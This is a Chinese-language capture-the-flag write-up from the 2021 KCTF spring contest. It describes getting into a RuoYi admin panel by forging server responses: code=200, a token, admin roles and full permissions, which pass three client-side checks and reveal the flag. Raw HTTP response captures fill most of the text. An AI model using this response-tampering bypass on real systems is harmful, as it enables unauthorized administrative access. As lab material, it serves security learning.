-
-
[原创]2021 KCTF 春季赛 统一门派
-
发表于: 2021-5-13 20:42
-
利用技术绕过限制,登陆后台获得flag的值
这是一个若依管理系统登录界面,绕过登录界面,即可看到flag。
前后端分离系统,修改服务端返回数据包,满足前端验证条件即可进行路由跳转。
程序首先将用户名密码等信息POST到服务端,服务端进行验证,前端接收服务端返回数据并验证。
第一层验证经分析发现其要求code=200以及token
因此构造数据包如下:
第一层验证通过。
第二层验证经分析发现其要求roles,permissions,msg,code=200,user等信息。
因此构造数据包如下:
第二层验证通过。
第三层验证经分析发现其要求code=200,data等信息。
因此构造数据包如下:
第三层验证通过。
成功进入到首页,获取flag
HTTP/1.1 200 OK
X-Powered-By: Express
vary: Origin, Access-Control-Request-Method, Access-Control-Request-Headers
access-control-allow-origin: http://121.36.145.157
access-control-allow-credentials: true
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: 0
content-type: application/json;charset=UTF-8
date: Thu, 13 May 2021 11:22:05 GMT
connection: closeContent-Length: 49
{"msg":"用户/密码正确","code":200,"token":"123465"}
HTTP/1.1 200 OK
X-Powered-By: Express
vary: Origin, Access-Control-Request-Method, Access-Control-Request-Headers
access-control-allow-origin: http://121.36.145.157
access-control-allow-credentials: true
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: 0
content-type: application/json;charset=UTF-8
date: Thu, 13 May 2021 11:22:05 GMT
connection: closeContent-Length: 49
{"msg":"用户/密码正确","code":200,"token":"123465"}
HTTP/1.1 200 OK
X-Powered-By: Express
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: 0
content-type: application/json;charset=utf-8
content-length: 84
date: Thu, 13 May 2021 11:14:06 GMT
connection: close{"roles":"[admin]","permissions":"all","msg":"成功获取用户信息","code":200,"user":{"avatar":"123456","useName":"admin"}}
HTTP/1.1 200 OK
X-Powered-By: Express
x-content-type-options: nosniff
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
